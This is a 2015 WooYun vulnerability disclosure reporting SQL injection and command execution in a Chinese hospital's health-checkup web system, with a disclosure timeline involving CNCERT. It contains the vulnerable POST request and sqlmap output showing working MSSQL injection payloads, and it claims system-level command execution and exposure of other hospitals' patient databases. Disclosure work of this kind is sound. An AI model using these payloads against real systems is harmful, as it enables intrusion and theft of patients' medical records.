当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140132

漏洞标题:东风汽车公司总医院体检系统存在SQL注入+命令执行

相关厂商:东风公司总医院

漏洞作者: 二愣子

提交时间:2015-09-12 10:21

修复时间:2015-10-30 08:10

公开时间:2015-10-30 08:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-12: 细节已通知厂商并且等待厂商处理中
2015-09-15: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-25: 细节向核心白帽子及相关领域专家公开
2015-10-05: 细节向普通白帽子公开
2015-10-15: 细节向实习白帽子公开
2015-10-30: 细节向公众公开

简要描述:

写歌的人假正经,听歌的人最无情~

详细说明:

1、注入

**.**.**.**/grhzb_p.asp" --data "xm=admin&gh=123456&kl=654321&kl1=&kl2=&zd=wj&B12.x=34&B12.y=22&B12=%C8%B7+%B6%A8


payload:

POST parameter 'xm' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 98 HTTP(s) requests:
---
Place: POST
Parameter: xm
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: xm=-2237' OR 8589=CONVERT(INT,(CHAR(58) CHAR(109) CHAR(113) CHAR(99) CHAR(58) (SELECT (CASE WHEN (8589=8589) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(121) CHAR(122) CHAR(119) CHAR(58))) AND 'xCGj'='xCGj&gh=123456&kl=654321&kl1=&kl2=&zd=wj&B12.x=34&B12.y=22&B12=%C8%B7 %B6%A8
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: xm=admin'; WAITFOR DELAY '0:0:5'--&gh=123456&kl=654321&kl1=&kl2=&zd=wj&B12.x=34&B12.y=22&B12=%C8%B7 %B6%A8
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: xm=-8087' OR 3049=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'xOho'='xOho&gh=123456&kl=654321&kl1=&kl2=&zd=wj&B12.x=34&B12.y=22&B12=%C8%B7 %B6%A8
---


2、命令执行
注入点是dba权限,可执行命令。而且,是system用户。想干嘛就干嘛~~~

漏洞证明:

1、注入点

注入证明.png


2、数据量

数据.png


3、命令执行
system权限

命令执行.png


泄露其它体检数据库(比如茅箭医院数据库)

泄露其他数据库.png


修复方案:

过滤过滤过滤

版权声明:转载请注明来源 二愣子@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-15 08:09

厂商回复:

CNVD确认并复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无


漏洞评价:

评论